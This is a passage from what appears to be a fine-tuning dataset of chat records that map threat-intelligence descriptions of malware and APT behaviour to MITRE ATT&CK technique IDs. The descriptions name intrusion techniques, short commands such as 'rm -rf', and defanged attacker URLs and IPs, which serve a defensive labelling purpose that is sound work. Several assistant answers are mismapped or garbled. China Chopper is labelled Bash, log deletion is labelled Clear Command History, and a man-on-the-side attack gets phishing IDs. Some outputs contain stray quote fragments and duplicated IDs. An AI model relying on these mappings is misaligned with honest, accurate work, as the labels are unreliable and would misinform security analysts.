- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime"
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has changed memory protection permissions then overwritten in memory DLL function code with shellcode, which was later executed via KernelCallbackTable hijacking. Lazarus Group has also used shellcode within macros to decrypt and manually map DLLs into memory at runtime."
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SysUpdate can delete its configuration file from the targeted system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy uses SMTP and POP3 for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Denis exploits a security vulnerability to load a fake DLL and execute its code."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "clears the system event logs."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VERMIN can perform audio capture."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Industroyer has a data wiper component that enumerates keys in the Registry \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\"."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Many ZeroT samples can perform UAC bypass by using eventvwr.exe to execute a malicious file."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to use rm -rf to remove folders and files from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If elevated privileges are not obtained, the malware falls back to using the same Windows registry run key as the older mode variant for persistence HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. However, if the malware is successful in elevating privileges, it begins to enumerate existing Windows services on the host that are configured to run as LocalSystem. The malware selects services that are currently not active and ignores services that launch the executables svchost.exe and lsass.exe. For each service, the malware attempts to take control of the service’s executable — first using icacls.exe with the /reset flag to reset the executable’s permissions, then using takeown.exe with the /F flag to take ownership of the executable"
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Moses Staff has used the commercial tool DiskCryptor."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As shown in Figure 11, after compromising an initial victim's system (patient 0), the threat actors use the Baidu search engine to search for the victim's organization name. They then identify the Exchange server and attempt to install the OwaAuth web shell. If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail, the adversaries identify other externally accessible servers and deploy ChinaChopper web shells. Within six hours of entering the environment, the threat actors compromised multiple systems and stole credentials for the entire domain"
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.004 - OS Credential Dumping: LSA Secrets', 'T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LiteDuke can wait 30 seconds before executing additional code if security software is detected."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USBferry can copy its installer to attached USB storage devices."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It downloads the file to the infected machine from the input URL using BITSAdmin, and is called every time the script attempts to download a file"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A noteworthy addition to the Poseidon toolkit is the IGT supertool (Information Gathering toolkit), a bulking 15 megabyte executable that orchestrates a series of different information collections steps, exfiltration, and the cleanup of components"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This screenshot is via an RDP session as indicated by the tab located at the top of the screen and is located at 164.132.67[.]216 which is hosted by OVH"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain passwords from common browsers and FTP clients."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping', 'T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has used a variety of Web shells."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exploits Print Nightmare vulnerability."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MarkiRAT can obtain the computer name from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception has maintained persistence by modifying Registry run key value \n \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The shellcode executed by this PowerShell is the exact same as in the delivery documents, using code from Metasploit which can obtain additional shellcode to execute using an HTTP request to the following URL: http://www7.chrome-up[.]date/0m5EE We were not able to retrieve the shellcode hosted at this URL"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1064 - Scripting', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron can be configured to automatically exfiltrate files under a specified directory."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Cobalt Strike System Profiler can discover applications through the browser and identify the version of Java the target has."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 has used WinRM via PowerShell to execute command and payloads on remote hosts."
- },
- {
- "role": "assistant",
- "content": "T1021.006 - Remote Services: Windows Remote Management"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor's has a plugin that captures screenshots of the target applications."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DCSrv has a function to sleep for two hours before rebooting the system."
- },
- {
- "role": "assistant",
- "content": "T1529 - System Shutdown/Reboot"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can steal credentials stored in Web browsers by querying the sqlite database."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has modified DNS resolvers to evade DNS monitoring tools."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "S-Type has used `ipconfig /all` on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DOGCALL can capture microphone data from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Summary In early May, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. To date, we have only collected 14 samples of this variant, indicating it may be sparingly used. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file’s contents. Attacks using Bisonal have been blogged about in the past. We believe it is likely these tools are being used by one group of attackers. Though Bisonal malware has been in the wild for at least seven years and frequently updated, the actors keep using same high-level playbooks. Common features of attacks involving Bisonal include"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following graph view from IDA shows these steps.These execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting into the cmd.exe process"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has routinely deleted log files on a compromised router, including automatic log deletion through the use of the logrotate utility."
- },
- {
- "role": "assistant",
- "content": "T1070.003 - Indicator Removal on Host: Clear Command History"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kevin can sleep for a time interval between C2 communication attempts."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used legitimate access granted to Managed Service Providers in order to access victims of interest."
- },
- {
- "role": "assistant",
- "content": "T1199 - Trusted Relationship"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpeakUp’s persistence is ensured by using cron and an internal mutex to ensure only one instance remains alive at all times"
- },
- {
- "role": "assistant",
- "content": "T1053.003 - Scheduled Task/Job: Cron"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA416 has used SMTP2Go to impersonate various European diplomatic organizations since at least 2020. In this historical campaign, TA416 delivered a DropBox URL that delivered a PlugX variant aligning with Recorded Future’s analysis of \"Red Delta\" PlugX malware. Included below is a publicly available malicious Zip file hash from August 2020 delivered via a DropBox URL which is attributable to TA416/Red Delta"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ChChes steals credentials stored inside Internet Explorer."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread. However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi´s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware. This dropper used an FTP with hardcoded credentials to receive its payload"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects data stored in the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used Visual Basic to download malicious payloads. Kimsuky has also used malicious VBA macros within maldocs disguised as forms that trigger when a victim types any content into the lure."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In analyzing FinFisher, the first obfuscation problem that requires a solution is the removal of junk instructions and “spaghetti code”, which is a technique that aims to confuse disassembly programs. Spaghetti code makes the program flow hard to read by adding continuous code jumps, hence the name. An example of FinFisher’s spaghetti code is shown below"
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "registers itself under a Registry Run key with the name \"USB Disk Security.\""
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SodaMaster has the ability to put itself to \"sleep\" for a specified time."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We have discovered that malware dubbed WinDealer, spread by Chinese-speaking APT actor LuoYu, has an ability to perform intrusions through a man-on-the-side attack"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link', 'T1566.002 - Phishing: Spearphishing Link', 'T1566.001 - Phishing: Spearphishing Attachment', 'T1566.002 - Phishing: Spearphishing Link', 'T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "captures window titles."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery', 'T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pony has used a small dictionary of common passwords against a collected list of local accounts."
- },
- {
- "role": "assistant",
- "content": "T1110.001 - Brute Force: Password Guessing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"SCOUT\" variant of achieves persistence by adding itself to the HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Registry key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 10: Network traffic to download final payload (words.exe) Once executed, the file performs the following activities: Drops a copy of itself in %AppData%\\svchost.exe\\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11)"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The OwaAuth web shell is likely created with a builder, given that the PE compile time of the binary does not change between instances and the configuration fields are padded to a specific size"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "transfers files from the compromised host via HTTP or HTTPS to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the variables are set, the command line script copies QlpxpQpOpDpnpRpC.ini to the executable name that has been picked for this run and then attempts to kill any legitimate process using the specified name before launching it. The name for the .ini file is randomized per archive, but almost always turns out to be that of the VNC server itself"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackMatter may wipe backup systems."
- },
- {
- "role": "assistant",
- "content": "T1561 - Disk Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GravityRAT has used HTTP over a non-standard port, such as TCP port 46769."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShadowPad has collected the PID of a malicious process."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The key differences in this variant: Two CAB files are encoded into the Word document in text boxes instead of being appended in the DOC file There is one CAB file for an x86 system and another for an x64 system This malware sample uses uacme.exe with dummy.dll to implement the UAC bypass exe is the program vulnerable to the UAC bypass attack dll runs install.bat to set up the service (same as NTWDBLIB.dll) exe and dummy.dll may be either 64-bit or 32-bit binaries based on the OS"
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MechaFlounder has the ability to run commands on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay can use a file exfiltration tool to upload specific files to Dropbox."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor has a plugin that collects information about inserted storage devices, modems, and phone devices."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An HTTP malware variant establishes persistence by setting the Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Debug Tools-%LOCALAPPDATA%\\."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has deleted existing logs and exfiltrated file archives from a victim."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macros are different. In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. It also does not use FTP for exfiltration"
- },
- {
- "role": "assistant",
